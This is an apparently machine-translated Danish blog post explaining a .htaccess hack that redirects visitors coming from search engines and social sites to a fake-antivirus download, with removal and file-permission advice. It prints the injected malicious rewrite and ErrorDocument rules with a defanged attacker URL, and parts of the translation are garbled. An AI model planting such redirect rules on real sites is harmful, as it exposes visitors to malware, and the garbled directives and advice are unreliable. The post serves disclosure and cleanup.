Malware / Virus - .htaccess "omskriv" og omdirigering

En ny form for virus som jeg ser ikke meget, påvirker sites hostes på upålidelige servere hvor brugerkonti / underdomæne-konto kan "ses" mellem dem. Specifikt placeres hostingkontiene alle i mappen "vhosts“, Og skriveretten til brugermappe fra "vhosts" gives til en almindelig bruger ... af forhandleren i de fleste situationer. Det er en typisk metode til webservere, der ikke bruger WHM / cPanel.

.Htaccess virushandling - .htaccess hack

Virus påvirke filer .htaccess Site of offeret. Jeg tilføjede linier / Direktiv til omdirigere besøgende (kommer fra yahoo, msn, google, facebook, yaindex, twitter, myspace osv. websteder med høj trafik og portaler) til nogle websteder, der tilbyder "antivirus“. Det handler om falske antivirus, Som jeg skrev i indledningen til .

Dette er hvordan en .htaccess påvirkes: (ikke få adgang til indhold webadresser i følgende linjer)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

OmskrivningEngin On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Livejasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Search. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

OmskrivningCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
OmskrivningCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Dem, der bruger WordPress de vil finde disse linjer i filen .htaccess fra public_html. Desuden skaber virus en. Identisk htaccess i mappen wp-indhold.

*Der er også situationer, hvor stedet opstår peoriavascularsurgery.com dns.thesoulfoodcafe.com eller andre adresser.

Hvad gør denne virus.

Når omdirigeret er den besøgende mødt med åbne arme af meddelelsen:

Advarsel!
Din computer indeholder forskellige tegn på tilstedeværelsen af ​​vira og malware-programmer. Dit system kræver et øjeblikkeligt antivirustjek!
System Sikkerhed udfører en hurtig og gratis scanning af din pc for vira og ondsindede programmer.

1 malware

Uanset hvilken knap vi trykker på, føres vi til siden "Denne computer", Oprettet for at efterligne design XP. Det er her, "scanningsprocessen" starter automatisk, i slutningen af ​​hvilken vi opdager, at "vi er inficeret".

2 malware

Når du klikker på OK eller Annuller, vil det begynde downloadeFilens setup.exe. dette setup.exe er falsk anti-virus påvirker systemet. Du installerer nogle malware at udbrede yderligere links virus, og udover disse en anti-virus software (også falsk), som offeret er inviteret til at købe.
De, der allerede kontaktet virus kan bruge denne formular . Det anbefales også at scanne hele harddisken. Anbefal Kaspersky Internet Security eller Kaspersky Anti-Virus.

Denne type virus påvirker besøgende OS operativsystemer Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Indtil videre har ingen kendte tilfælde af infektion i operativsystemerne Windows Syn ja Windows 7.

Hvordan kan vi fjerne denne virus. Htaccess fil på serveren, og hvordan man kan forebygge infektion.

1. Analysere mistænkelige filer og sletning koder. At sikre, at filen ikke påvirkes kun .htaccess er bedre analysere alle filer . Php si . Js.

2. Rewriting fil. Htaccess og jeg indstille chmod 644 eller 744 med skriveadgang kun bruger ejeren.

3. Når du opretter en hosting konto for en hjemmeside i mappen / home eller / Webroot Dette vil automatisk oprette en mappe som ofte har brugerens navn (bruger for cpanel, ftp, Etc.). Til at forhindre skrivning data og overførsel af virus fra én bruger til en anden, anbefales det, at hver bruger mappe, der skal indstilles:

chmod 644 eller 744, 755 – 644 er angivet.
chown -R brugernavn mappenavn.
chgrp-R nume_user nume_folder

ls-all måder at kontrollere, hvis de blev foretaget korrekt. Skal vises noget som dette:

drwx - x - x 12 dinamik dinamik 4096 6. maj 14:51 dinamik /
drwx - x - x 10 duran duran 4096 Mar 7 07:46 duran /
drwx - x - x 12 reagensglas reagensglas 4096 Jan 29 11:23 reagensglas /
drwxr-xr-x 14 express express 4096 26. februar 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19. maj 01:09 ezo /
drwx - x - x 9 farma farma 4096 19. december 22:29 farma /

Hvis et af ovenstående vil være userele FTP Inficerede filerDet kan ikke sende virus til en anden bruger vært. Det er et minimum sikkerhedsnet til at beskytte konti hostes på en webserver.

Fælles elementer i de områder, der berøres af denne type virus.

Alle berørte domæner omdirigerer besøgende til websteder, der indeholder "/main.php? s = 4 & H".

Det her "virus. htaccess”Påvirker enhver form for CMS (joomla, WordPress, phpBBOsv.), der bruger .htaccess

.htaccess Virus Hack & Redirect.

Stifter og redaktør Stealth Settings, fra 2006 til i dag. Erfaring med operativsystemer Linux (Især CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Hvordan man » AntiVirus og sikkerhed » Malware / Virus - .htaccess "omskriv" og omdirigering
Efterlad en kommentar